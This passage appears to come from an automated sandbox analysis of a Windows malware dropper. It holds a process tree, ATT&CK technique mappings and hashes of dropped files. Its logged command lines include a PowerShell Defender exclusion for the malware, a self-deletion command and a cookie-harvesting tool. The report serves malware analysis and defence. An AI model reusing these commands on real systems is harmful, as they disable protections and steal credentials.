                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4628
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:6944
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5796
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:6300
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\do2d5ulg.oq2\toolspab1.exe & exit
                                                                                            6⤵
                                                                                              PID:5460
                                                                                              • C:\Users\Admin\AppData\Local\Temp\do2d5ulg.oq2\toolspab1.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\do2d5ulg.oq2\toolspab1.exe
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:4500
                                                                                                • C:\Users\Admin\AppData\Local\Temp\do2d5ulg.oq2\toolspab1.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\do2d5ulg.oq2\toolspab1.exe
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:2932
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\usbf1nao.wb0\GcleanerWW.exe /mixone & exit
                                                                                              6⤵
                                                                                                PID:5492
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3qzamnzi.lm5\42a25820.exe & exit
                                                                                                6⤵
                                                                                                  PID:5300
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3qzamnzi.lm5\42a25820.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\3qzamnzi.lm5\42a25820.exe
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:6172
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Modifies system certificate store
                                                                                          PID:4964
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                            3⤵
                                                                                              PID:5936
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping 127.0.0.1
                                                                                                4⤵
                                                                                                • Runs ping.exe
                                                                                                PID:6056
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks whether UAC is enabled
                                                                                            PID:6284
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:776
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4772
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:6728
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4672
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5100
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                          1⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3092
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Modifies registry class
                                                                                            PID:4012
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Checks processor information in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:4608
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:2248
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:748
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                          1⤵
                                                                                          • Enumerates connected drives
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Modifies registry class
                                                                                          PID:5760
                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 41A763A8D71F8D000E2F1B429638AC44 C
                                                                                            2⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:6004
                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 04C27F3025FC544739695C9AA5FB3BAB
                                                                                            2⤵
                                                                                            • Blocklisted process makes network request
                                                                                            • Loads dropped DLL
                                                                                            PID:6128
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                              3⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:5496
                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding A87DC007F8BD8C6D9050DBF64C95DEC5 E Global\MSI0000
                                                                                            2⤵
                                                                                            • Loads dropped DLL
                                                                                            PID:4216
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5820
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          PID:4576
                                                                                        • C:\Windows\system32\werfault.exe
                                                                                          werfault.exe /h /shared Global\f264e263fc6c4c46860238e84774409c /t 4984 /p 4576
                                                                                          1⤵
                                                                                            PID:5264
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                              PID:6380
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:5372
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                  PID:7164
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5412
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:4448
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:6076
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:6692
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:5620
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:4432
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:2888
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\247C.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\247C.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Windows security modification
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:5860
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\409b8045-7d47-4879-a9cf-c6e449cc8019\AdvancedRun.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\409b8045-7d47-4879-a9cf-c6e449cc8019\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\409b8045-7d47-4879-a9cf-c6e449cc8019\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2724
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\409b8045-7d47-4879-a9cf-c6e449cc8019\AdvancedRun.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\409b8045-7d47-4879-a9cf-c6e449cc8019\AdvancedRun.exe" /SpecialRun 4101d8 2724
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4680
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\247C.exe" -Force
                                                                                                            2⤵
                                                                                                              PID:780
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                              2⤵
                                                                                                                PID:6488
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout 1
                                                                                                                  3⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:4984
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\247C.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\247C.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5868
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 1616
                                                                                                                2⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Program crash
                                                                                                                PID:2944
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                              1⤵
                                                                                                                PID:5800
                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                1⤵
                                                                                                                  PID:4276
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:4716
                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                  PID:5792
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:5948
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:3868
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:6764
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:6968
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:6232
                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:6220
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                    1⤵
                                                                                                                      PID:4164

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                    Persistence

                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                    1
                                                                                                                    T1060

                                                                                                                    BITS Jobs

                                                                                                                    1
                                                                                                                    T1197

                                                                                                                    Defense Evasion

                                                                                                                    Disabling Security Tools

                                                                                                                    3
                                                                                                                    T1089

                                                                                                                    Modify Registry

                                                                                                                    6
                                                                                                                    T1112

                                                                                                                    BITS Jobs

                                                                                                                    1
                                                                                                                    T1197

                                                                                                                    Install Root Certificate

                                                                                                                    1
                                                                                                                    T1130

                                                                                                                    Credential Access

                                                                                                                    Credentials in Files

                                                                                                                    1
                                                                                                                    T1081

                                                                                                                    Discovery

                                                                                                                    Software Discovery

                                                                                                                    1
                                                                                                                    T1518

                                                                                                                    Query Registry

                                                                                                                    5
                                                                                                                    T1012

                                                                                                                    System Information Discovery

                                                                                                                    6
                                                                                                                    T1082

                                                                                                                    Security Software Discovery

                                                                                                                    1
                                                                                                                    T1063

                                                                                                                    Peripheral Device Discovery

                                                                                                                    2
                                                                                                                    T1120

                                                                                                                    Remote System Discovery

                                                                                                                    1
                                                                                                                    T1018

                                                                                                                    Collection

                                                                                                                    Data from Local System

                                                                                                                    1
                                                                                                                    T1005

                                                                                                                    Command and Control

                                                                                                                    Web Service

                                                                                                                    1
                                                                                                                    T1102

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                      MD5

                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                      SHA1

                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                      SHA256

                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                      SHA512

                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                      MD5

                                                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                      SHA1

                                                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                      SHA256

                                                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                      SHA512

                                                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                    • C:\Program Files\MSBuild\OHAUPXFSEZ\ultramediaburner.exe
                                                                                                                      MD5

                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                      SHA1

                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                      SHA256

                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                      SHA512

                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                    • C:\Program Files\MSBuild\OHAUPXFSEZ\ultramediaburner.exe
                                                                                                                      MD5

                                                                                                                      6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                      SHA1

                                                                                                                      938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                      SHA256

                                                                                                                      b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                      SHA512

                                                                                                                      a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                    • C:\Program Files\install.dat
                                                                                                                      MD5

                                                                                                                      806c3221a013fec9530762750556c332

                                                                                                                      SHA1

                                                                                                                      36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                      SHA256

                                                                                                                      9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                      SHA512

                                                                                                                      56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                    • C:\Program Files\install.dll
                                                                                                                      MD5

                                                                                                                      fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                      SHA1

                                                                                                                      6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                      SHA256

                                                                                                                      9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                      SHA512

                                                                                                                      0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                      MD5

                                                                                                                      e8f9ee1acf0775666bd07aba781e96bc

                                                                                                                      SHA1

                                                                                                                      24bd2847a41293057f07d97f91fe375848aa70f3

                                                                                                                      SHA256

                                                                                                                      58ce03a252b823a3e76d8b3f7bd8b0f11d0ee879a48064f8cec6039185f637e3

                                                                                                                      SHA512

                                                                                                                      a9fc40ee024158c9c0a66b6fc298bdc2d7d67606610af66506ad7b907332aaf3dd680d342303ebc1977700266c440417d06ef752b6300b3e3e86913403c6fd9e

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                      MD5

                                                                                                                      b0b41126565a0a6e9983b80bbeeeda52

                                                                                                                      SHA1

                                                                                                                      55de1515ae28f594d7eb30211df6aa99b2ce6bd5

                                                                                                                      SHA256

                                                                                                                      74e93fcf70e5301715d1d53cc2e2a1eb484bcad74baea28bbe648a5161e0c5a5

                                                                                                                      SHA512

                                                                                                                      0b31bc5ec69834e7e9228bf373176286c697f7ac23a541f655aa4bc50284ea643d25c3cdbd7ecf1e4e0d128c6dc06a74ad1c2480d7a8661ee4d4c7cd25ef7ffc

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                      MD5

                                                                                                                      42aba3ba7d90f5e8939f9109675329fe

                                                                                                                      SHA1

                                                                                                                      4f6bcb27a3b261a8ed6b590124e4923a8fa23a19

                                                                                                                      SHA256

                                                                                                                      ac998f01309891ab31ec479680a29a9d9e72333562b512dfb3f88bc7c39008b9

                                                                                                                      SHA512

                                                                                                                      fcc4a0f22991bbea3f9945ccc94ec5782eb22c71d5e9c49b07566f8054ff20113554516aa6bb8496adad9abe74acc05123a376c6eafd3df315c7ff7e984b0383

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                      MD5

                                                                                                                      b71de6b5e797e454261b7bf776414a9c

                                                                                                                      SHA1

                                                                                                                      2ac5244a225132ebfabaca91a6534da860d6a83c

                                                                                                                      SHA256

                                                                                                                      1f84f0fd5dea2d62dfebaaa034e5f802a56ab91956f16f1d315306744645cc09

                                                                                                                      SHA512

                                                                                                                      83166ae75d3f9a2c417403130d13082cd3430ea91d272d506233812fe4a97400c5e32a61cd655b5b2525b57e29dbc8437b824351acf54da8b79342e2286fe984

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22fmomyo.d4d\y1.exe
                                                                                                                      MD5

                                                                                                                      211704d0d7c978042c9fd858fd7a3256

                                                                                                                      SHA1

                                                                                                                      ed582bf85c777e03990562af0ca5d3503646e462

                                                                                                                      SHA256

                                                                                                                      98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                                                                      SHA512

                                                                                                                      a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22fmomyo.d4d\y1.exe
                                                                                                                      MD5

                                                                                                                      211704d0d7c978042c9fd858fd7a3256

                                                                                                                      SHA1

                                                                                                                      ed582bf85c777e03990562af0ca5d3503646e462

                                                                                                                      SHA256

                                                                                                                      98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                                                                      SHA512

                                                                                                                      a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2kdgkk4a.nz5\gpooe.exe
                                                                                                                      MD5

                                                                                                                      6e81752fb65ced20098707c0a97ee26e

                                                                                                                      SHA1

                                                                                                                      948905afef6348c4141b88db6c361ea9cfa01716

                                                                                                                      SHA256

                                                                                                                      b978743a252c7d0661b1a41a60a68ee1a4d4ff5f21c597ebbe1c50dbe91dbed6

                                                                                                                      SHA512

                                                                                                                      00c870461d47b7479f15594659141e3ced7c3f3d4b4151fb7776ab62d4816c587b388d024ab8edff1190bd23148897f085f736e897657c6f02a8f62f7af1cfaa

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2kdgkk4a.nz5\gpooe.exe
                                                                                                                      MD5

                                                                                                                      6e81752fb65ced20098707c0a97ee26e

                                                                                                                      SHA1

                                                                                                                      948905afef6348c4141b88db6c361ea9cfa01716

                                                                                                                      SHA256

                                                                                                                      b978743a252c7d0661b1a41a60a68ee1a4d4ff5f21c597ebbe1c50dbe91dbed6

                                                                                                                      SHA512

                                                                                                                      00c870461d47b7479f15594659141e3ced7c3f3d4b4151fb7776ab62d4816c587b388d024ab8edff1190bd23148897f085f736e897657c6f02a8f62f7af1cfaa

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\35r0y1pl.4lu\installer.exe
                                                                                                                      MD5

                                                                                                                      cd5e5ff81c7acf017878b065357f3568

                                                                                                                      SHA1

                                                                                                                      096900f55df446b72f9237f80aaf090001afa2a2

                                                                                                                      SHA256

                                                                                                                      7eadd0ce64f3bfad81459a33a6f12521126b67a69dc19160e2ada42d50b4a3c3

                                                                                                                      SHA512

                                                                                                                      1cf3d72f09827b5ea5f0ab4560032a09007845f615b18ea5a1d0eac697b100e88967db2b42ce6c36a957246ba8d011b0881c45bff37eed42b9803db687d9f1c3

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\35r0y1pl.4lu\installer.exe
                                                                                                                      MD5

                                                                                                                      cd5e5ff81c7acf017878b065357f3568

                                                                                                                      SHA1

                                                                                                                      096900f55df446b72f9237f80aaf090001afa2a2

                                                                                                                      SHA256

                                                                                                                      7eadd0ce64f3bfad81459a33a6f12521126b67a69dc19160e2ada42d50b4a3c3

                                                                                                                      SHA512

                                                                                                                      1cf3d72f09827b5ea5f0ab4560032a09007845f615b18ea5a1d0eac697b100e88967db2b42ce6c36a957246ba8d011b0881c45bff37eed42b9803db687d9f1c3

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\MSI6C9C.tmp
                                                                                                                      MD5

                                                                                                                      d07ddd437009ebb9c21882579bf2df0d

